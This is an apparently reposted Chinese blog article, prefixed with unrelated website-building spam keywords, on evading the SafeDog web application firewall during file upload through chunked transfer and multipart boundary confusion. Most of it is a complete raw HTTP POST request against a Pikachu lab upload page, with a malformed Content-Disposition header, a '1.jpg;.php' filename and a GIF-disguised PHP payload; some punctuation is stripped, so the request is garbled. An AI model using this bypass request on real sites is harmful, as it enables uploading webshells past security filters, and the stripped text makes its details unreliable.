做网站的生产方式,佛山+客户端官网,江门网站建设推荐,网站的策划和建设本文来源无问社区#xff0c;更多实战内容#xff0c;渗透思路可前往查看http://www.wwlib.cn/index.php/artread/artid/9960.html
http分块传输绕过
http分块传输⼀直是⼀个很经典的绕过⽅式#xff0c;只是在近⼏年分块传输⼀直被卡的很死#xff0c;很多waf都开始加
…本文来源无问社区更多实战内容渗透思路可前往查看http://www.wwlib.cn/index.php/artread/artid/9960.html
http分块传输绕过
http分块传输⼀直是⼀个很经典的绕过⽅式只是在近⼏年分块传输⼀直被卡的很死很多waf都开始加
⼊了检测功能所以的话分块传输这⾥也不是很好使但是配合边界混淆好使的⼀批。
单纯http分块传输已经⽆法绕过 boundary边界混淆绕过 配合开源的⽅式来进⾏绕过
开源绕过1
在百度上有很多开源的⽅式来绕过安全狗但是⼀⼀测试发现绕过效果⾮常之垃圾⼏乎都遇到了狗的阻拦所以这⾥就经过变种fuzz来实现绕过安全狗直接贴代码。 POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1
Host: 192.168.172.161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary---------------------------378605579232816195651620102739
Content-Length: 448
Origin: http://192.168.172.161
Connection: close
Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php
Cookie: PHPSESSIDsop5homauph2bdfeidn6ttv8l1
Upgrade-Insecure-Requests: 1-----------------------------378605579232816195651620102739
Content-Disposition: form-data; nameuploadfile;fagfhaiofnalkvjoaffufile namefjalfmavlaa; filename1.jpg;.php
Content-Type: image/jpeg
GIF89a
]\
d]\[
/\
\]]\
/\]
w?php phpinfo();
-----------------------------378605579232816195651620102739
Content-Disposition: form-data; namesubmit
开始上传
-----------------------------378605579232816195651620102739--